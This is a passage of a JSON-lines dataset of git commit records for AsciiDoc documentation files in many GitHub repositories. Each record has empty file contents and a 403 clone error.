2017-02-07-Mi-primer-post.adoc","repos":"ghostbind\/ghostbind.github.io,ghostbind\/ghostbind.github.io,ghostbind\/ghostbind.github.io,ghostbind\/ghostbind.github.io","old_file":"_posts\/2017-02-07-Mi-primer-post.adoc","new_file":"_posts\/2017-02-07-Mi-primer-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ghostbind\/ghostbind.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"16317c2864bc5c1b29d807987cb0e963db6363f3","subject":"Delete the file at '_posts\/2017-02-25adocadoc-part-1.adoc'","message":"Delete the file at '_posts\/2017-02-25adocadoc-part-1.adoc'","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2017-02-25adocadoc-part-1.adoc","new_file":"_posts\/2017-02-25adocadoc-part-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5f4feba930a0c013815d87ad3c3520d46e9685fb","subject":"Update 2017-06-05-requests-via-ntlm-proxy.adoc","message":"Update 
2017-06-05-requests-via-ntlm-proxy.adoc","repos":"debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io","old_file":"_posts\/2017-06-05-requests-via-ntlm-proxy.adoc","new_file":"_posts\/2017-06-05-requests-via-ntlm-proxy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debbiezhu\/debbiezhu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"33112ca2d97b5ef4a05c23480205ae373039004d","subject":"doc: implementers add include structure","message":"doc: implementers add include structure\n\nSigned-off-by: Mike Holmes <ed44c09f4d7f698f5510adc894a872c73e08c8bd@linaro.org>\nReviewed-by: Bill Fischofer <52f3c909d51cc5d355a68a403df6906b3c1a8f83@linaro.org>\nSigned-off-by: Maxim Uvarov <db4d16e02ae2d7493db430203537da8b2e34f290@linaro.org>\n","repos":"ravineet-singh\/odp,dkrot\/odp,dkrot\/odp,dkrot\/odp,mike-holmes-linaro\/odp,mike-holmes-linaro\/odp,rsalveti\/odp,nmorey\/odp,erachmi\/odp,dkrot\/odp,nmorey\/odp,mike-holmes-linaro\/odp,kalray\/odp-mppa,rsalveti\/odp,ravineet-singh\/odp,kalray\/odp-mppa,kalray\/odp-mppa,kalray\/odp-mppa,rsalveti\/odp,ravineet-singh\/odp,kalray\/odp-mppa,nmorey\/odp,mike-holmes-linaro\/odp,kalray\/odp-mppa,ravineet-singh\/odp,erachmi\/odp,nmorey\/odp,erachmi\/odp,rsalveti\/odp,kalray\/odp-mppa,rsalveti\/odp,erachmi\/odp","old_file":"doc\/implementers-guide\/implementers-guide.adoc","new_file":"doc\/implementers-guide\/implementers-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nmorey\/odp.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"d774a558fb26c4f0b22287ac15bd82cbf5930d72","subject":"About URI VS URL","message":"About URI VS URL\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Best practices\/Various.adoc","new_file":"Best practices\/Various.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"442c3b8bcf3a8157d8b7fe6d5f6319ef8416e3ab","subject":"docs: fix link","message":"docs: fix 
link\n","repos":"s1monw\/elasticsearch,s1monw\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,gfyoung\/elasticsearch,fred84\/elasticsearch,scottsom\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,wangtuo\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,s1monw\/elasticsearch,s1monw\/elasticsearch,rajanm\/elasticsearch,scottsom\/elasticsearch,wangtuo\/elasticsearch,uschindler\/elasticsearch,kalimatas\/elasticsearch,gingerwizard\/elasticsearch,kalimatas\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,scottsom\/elasticsearch,fred84\/elasticsearch,rajanm\/elasticsearch,scottsom\/elasticsearch,qwerty4030\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,fred84\/elasticsearch,gingerwizard\/elasticsearch,qwerty4030\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,rajanm\/elasticsearch,nknize\/elasticsearch,wangtuo\/elasticsearch,rajanm\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,rajanm\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,kalimatas\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,kalimatas\/elasticsearch,wangtuo\/elasticsearch,scorpionvicky\/elasticsearch,scottsom\/elasticsearch,qwerty4030\/elasticsearch,fred84\/elasticsearch,fred84\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,rajanm\/elasticsearch,qwerty4030\/elasticsearch,qwerty4030\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,kalimatas\/elasticsearch,wangtuo\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,s1monw\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,gfyoung\/elasticsearch","old_file":"docs\/reference\/analysis\/tokenfilters\/normalization-tokenfilter.asciidoc","new_file":"docs\/reference\/analysis\/tokenfilters\/normalization-tokenfilter.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gingerwizard\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7025c67d164712cb391507bd3d1b8f38e3c07761","subject":"Updated readme.","message":"Updated readme.\n","repos":"hypatia-software-org\/hypatia-engine,lillian-lemmer\/hypatia,Applemann\/hypatia,hypatia-software-org\/hypatia-engine,lillian-lemmer\/hypatia,Applemann\/hypatia,brechin\/hypatia,brechin\/hypatia","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hypatia-software-org\/hypatia-engine.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a94049a2a4bc00093ff7461c10af777982f869f1","subject":"Update 2016-10-14-Try-Line-Notify.adoc","message":"Update 
2016-10-14-Try-Line-Notify.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9e5fdc0de0dab1152877046fa452e971ea44317d","subject":"Update 2017-02-15-Philips-Hue-Hub.adoc","message":"Update 2017-02-15-Philips-Hue-Hub.adoc","repos":"datumrich\/datumrich.github.io,datumrich\/datumrich.github.io,datumrich\/datumrich.github.io,datumrich\/datumrich.github.io","old_file":"_posts\/2017-02-15-Philips-Hue-Hub.adoc","new_file":"_posts\/2017-02-15-Philips-Hue-Hub.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/datumrich\/datumrich.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3139edef052e9ba0630ad6acfea4e054a77785fc","subject":"Update 2017-05-25-Your-Blog-title.adoc","message":"Update 2017-05-25-Your-Blog-title.adoc","repos":"PertuyF\/PertuyF.github.io,PertuyF\/PertuyF.github.io,PertuyF\/PertuyF.github.io,PertuyF\/PertuyF.github.io","old_file":"_posts\/2017-05-25-Your-Blog-title.adoc","new_file":"_posts\/2017-05-25-Your-Blog-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PertuyF\/PertuyF.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f66bc3c081f190df83b91ff45ec69126ec70939","subject":"Update 2017-11-08-Github-Research.adoc","message":"Update 2017-11-08-Github-Research.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-11-08-Github-Research.adoc","new_file":"_posts\/2017-11-08-Github-Research.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"256f8b54cb572e0ffc6e98118b11a3f01f735452","subject":":memo: Modern JS","message":":memo: Modern JS\n","repos":"syon\/refills","old_file":"src\/refills\/javascript\/modern-code-tips.adoc","new_file":"src\/refills\/javascript\/modern-code-tips.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/syon\/refills.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"93138ec865cfbcc0fe477e472df2db684ad6f248","subject":"Update 2016-10-21-algo-1826.adoc","message":"Update 2016-10-21-algo-1826.adoc","repos":"tmdgus0118\/blog.code404.co.kr,tmdgus0118\/blog.code404.co.kr,tmdgus0118\/blog.code404.co.kr,tmdgus0118\/blog.code404.co.kr","old_file":"_posts\/2016-10-21-algo-1826.adoc","new_file":"_posts\/2016-10-21-algo-1826.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tmdgus0118\/blog.code404.co.kr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0c639ba85c2338b5e7f61a5659f07e44ccfe69c","subject":"Incorrect return 
description for method `emerald_newAccount`","message":"Incorrect return description for method `emerald_newAccount`\n\nFix return parameter description and reformat the example.\n","repos":"dulanov\/emerald-rs","old_file":"docs\/api.adoc","new_file":"docs\/api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"07cf60244c18b21fe225e80f6daf98702db2c413","subject":"Update 2015-10-05-So-close-yet-so-far.adoc","message":"Update 2015-10-05-So-close-yet-so-far.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-10-05-So-close-yet-so-far.adoc","new_file":"_posts\/2015-10-05-So-close-yet-so-far.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e14dda6ba333c4af979212dfb1da8b920eff1d6c","subject":"Update 2016-04-06-Tenemos-un-problema.adoc","message":"Update 2016-04-06-Tenemos-un-problema.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-06-Tenemos-un-problema.adoc","new_file":"_posts\/2016-04-06-Tenemos-un-problema.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7276bd02cca9689d050877ea936887e6c16de6a2","subject":"Update 2016-08-12-Why-Using-Framework.adoc","message":"Update 2016-08-12-Why-Using-Framework.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-08-12-Why-Using-Framework.adoc","new_file":"_posts\/2016-08-12-Why-Using-Framework.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ec77913167e47da24ef7ac885cd66fa3c690e619","subject":"Update 2017-11-23-Azure-8.adoc","message":"Update 2017-11-23-Azure-8.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-23-Azure-8.adoc","new_file":"_posts\/2017-11-23-Azure-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bb6a6207b70f8eed4f5c285dfb08761c34241850","subject":"Update 2018-06-24-.adoc","message":"Update 2018-06-24-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-24-.adoc","new_file":"_posts\/2018-06-24-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL 
returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8abf0d9b81d2fc45c8af741ef807b0183fe06ff6","subject":"y2b create post iPhone 6 Plus Bend Test","message":"y2b create post iPhone 6 Plus Bend Test","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-09-23-iPhone-6-Plus-Bend-Test.adoc","new_file":"_posts\/2014-09-23-iPhone-6-Plus-Bend-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3dac75803e2466dfe3da1ebc291d11d5a785c042","subject":"Update 2016-11-20-The-Importance-of-Research.adoc","message":"Update 2016-11-20-The-Importance-of-Research.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-11-20-The-Importance-of-Research.adoc","new_file":"_posts\/2016-11-20-The-Importance-of-Research.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"29904c04aaaf6660b3d69180e2f4600315a3557f","subject":"One more formatting fix for release notes","message":"One more formatting fix for release notes\n\nSame fix as prior similar commit, but for a late change to\nthe release notes, so got missed the first time around.\n\nChange-Id: I2272775c7b97afdaa9abfdc2101a326595de3ae0\n","repos":"cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cd4cccecc473d9722f4cf67f7049849dd9297bc9","subject":"Update 2017-04-14-Azure-3.adoc","message":"Update 2017-04-14-Azure-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-14-Azure-3.adoc","new_file":"_posts\/2017-04-14-Azure-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5c995b882f2281814ddcdb439a8e904ade1cac97","subject":"Update 2018-11-08-develop.adoc","message":"Update 
2018-11-08-develop.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-08-develop.adoc","new_file":"_posts\/2018-11-08-develop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da3fe58345473913d5ed2157533a6de6f5fde804","subject":"Update 2018-11-11-Vuejs-3.adoc","message":"Update 2018-11-11-Vuejs-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-11-Vuejs-3.adoc","new_file":"_posts\/2018-11-11-Vuejs-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"710582c60359c1256b303ed679fa705d7f0bddeb","subject":"Update 2018-2-2-Web-R-T-C.adoc","message":"Update 2018-2-2-Web-R-T-C.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-2-2-Web-R-T-C.adoc","new_file":"_posts\/2018-2-2-Web-R-T-C.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c85f8577c8c4dd560cb043e2e2bef5fbced46292","subject":"Clearer second ex","message":"Clearer second ex\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"WS client.adoc","new_file":"WS client.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"731801f5b4dfdd34c6c8ef6389ae893f229f0152","subject":"Rm {emptyattr} breaking URL check","message":"Rm {emptyattr} breaking URL check\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Objects & interfaces\/Equals.adoc","new_file":"Objects & interfaces\/Equals.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9fb1ca459328a4d1c0b6ee7b58f3f854a663d7fa","subject":"Debezium 0.10.0.CR1 release announcement","message":"Debezium 0.10.0.CR1 release announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2019-09-10-debezium-0-10-0-cr1-released.adoc","new_file":"blog\/2019-09-10-debezium-0-10-0-cr1-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bafd0de7eb1023032903f6279a704abce2e9c8aa","subject":"Update 2014-09-16-Technical-Difficulties.adoc","message":"Update 
2014-09-16-Technical-Difficulties.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2014-09-16-Technical-Difficulties.adoc","new_file":"_posts\/2014-09-16-Technical-Difficulties.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"72b7560576daa3dcf1c8140ef0ef8ff970a4d7e1","subject":"Better wording for channel monad docs","message":"Better wording for channel monad docs\n","repos":"OlegTheCat\/cats,yurrriq\/cats,alesguzik\/cats,tcsavage\/cats,funcool\/cats,mccraigmccraig\/cats","old_file":"doc\/cats.adoc","new_file":"doc\/cats.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yurrriq\/cats.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"2429bbbc56da78ab90c23692f023f5caf49d115c","subject":"Update 2016-10-07-Learning-To-Be-Present.adoc","message":"Update 2016-10-07-Learning-To-Be-Present.adoc","repos":"gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io","old_file":"_posts\/2016-10-07-Learning-To-Be-Present.adoc","new_file":"_posts\/2016-10-07-Learning-To-Be-Present.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gudhakesa\/gudhakesa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a5b35be4049f0f5e8a3a0c6647e2927a7820704a","subject":"Broken link to `usage.txr`","message":"Broken link to `usage.txr`\n\nFix the link path.\n","repos":"dulanov\/emerald-rs","old_file":"docs\/cli.adoc","new_file":"docs\/cli.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"05e01dda7e8b5b7418ac265addab53f8b53affd2","subject":"Renamed '_posts\/2017-12-29-work-it-on-not.adoc' to '_posts\/2017-12-29-what-if-i-wrote-it-in-english.adoc'","message":"Renamed '_posts\/2017-12-29-work-it-on-not.adoc' to '_posts\/2017-12-29-what-if-i-wrote-it-in-english.adoc'","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2017-12-29-what-if-i-wrote-it-in-english.adoc","new_file":"_posts\/2017-12-29-what-if-i-wrote-it-in-english.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"00a9a3e0d572bbeda75ac564399e5655f5058c59","subject":"Update 2017-03-25-create-pc.adoc","message":"Update 2017-03-25-create-pc.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-25-create-pc.adoc","new_file":"_posts\/2017-03-25-create-pc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"1d3f90274032442b0b46de2985ac6fef6054a77e","subject":"Update 2016-01-13-how-to-install-python-on-linux.adoc","message":"Update 2016-01-13-how-to-install-python-on-linux.adoc","repos":"Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io","old_file":"_posts\/2016-01-13-how-to-install-python-on-linux.adoc","new_file":"_posts\/2016-01-13-how-to-install-python-on-linux.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Lh4cKg\/Lh4cKg.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f69e6cde1e984abadd0d4b59fc3c4b35d168ab4a","subject":"#243 add first version of sakuli-api.adoc","message":"#243 add first version of sakuli-api.adoc\n","repos":"ConSol\/sakuli,ConSol\/sakuli,ConSol\/sakuli,ConSol\/sakuli,ConSol\/sakuli,ConSol\/sakuli","old_file":"docs\/manual\/testdefinition\/sakuli-api.adoc","new_file":"docs\/manual\/testdefinition\/sakuli-api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ConSol\/sakuli.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"276dbc292558958fbe545b456ea82b7bde1e0779","subject":"Update repositories.asciidoc","message":"Update repositories.asciidoc\n\nAdded a warning explaining how `add-apt-repository` adds a `deb-src` entry, which can result in errors.\n\nCloses #10223\n","repos":"bestwpw\/elasticsearch,skearns64\/elasticsearch,apepper\/elasticsearch,kubum\/elasticsearch,kalburgimanjunath\/elasticsearch,petabytedata\/elasticsearch,Collaborne\/elasticsearch,petabytedata\/elasticsearch,mkis-\/elasticsearch,rhoml\/elasticsearch,hanswang\/elasticsearch,markllama\/elasticsearch,knight1128\/elasticsearch,nellicus\/elasticsearch,golubev\/elasticsearch,dongjoon-hyun\/elasticsearch,xpandan\/elasticsearch,jeteve\/elasticsearch,StefanGor\/elasticsearch,MjAbuz\/elasticsearch,fekaputra\/elasticsearch,avikurapati\/elasticsearch,xuzha\/elasticsearch,robin13\/elasticsearch,diendt\/elasticsearch,dylan8902\/elasticsearch,i-am-Nathan\/elasticsearch,linglaiyao1314\/elasticsearch,AshishThakur\/elasticsearch,robin13\/elasticsearch,iantruslove\/elasticsearch,JSCooke\/elasticsearch,lmtwga\/elasticsearch,bawse\/elasticsearch,Flipkart\/elasticsearch,djschny\/elasticsearch,kubum\/elasticsearch,polyfractal\/elasticsearch,shreejay\/elasticsearch,nomoa\/elasticsearch,Brijeshrpatel9\/elasticsearch,18098924759\/elasticsearch,thecocce\/elasticsearch,Shekharrajak\/elasticsearch,Fsero\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,kenshin233\/elasticsearch,vingupta3\/elasticsearch,ThalaivaStars\/OrgRepo1,HarishAtGitHub\/elasticsearch,iantruslove\/elasticsearch,clintongormley\/elasticsearch,uschindler\/elasticsearch,dylan8902\/elasticsearch,mnylen\/elasticsearch,iacdingping\/elasticsearch,andrejserafim\/elasticsearch,ulkas\/elasticsearch,cwurm\/elasticsearch,Fsero\/elasticsearch,markllama\/elasticsearch,ouyangkongtong\/elasticsearch,socialrank\/elasticsearch,shreejay\/elasticsearch,weipinghe\/elasticsearch,AshishThakur\/elasticsearch,amaliujia\/elasticsearch,yuy168\/elasticsearch,EasonYi\/elasticsearch,feiqitian\/elasticsearch,slavau\/elasticsearch,YosuaMichael\/elasticsearch,spiegela\/elasticsearch,amaliujia\/elasticsearch,jaynblue\/elasticsearch,ImpressTV\/elasticsearch,wimvds\/elasticsearch,dongjoon-hyun\/elasticsearch,kenshin233\/elasticsearch,thecocce\/elasticsearch,beiske\/elasticsearch,fforbeck\/elasticsearch,chirilo\/elasticsearch
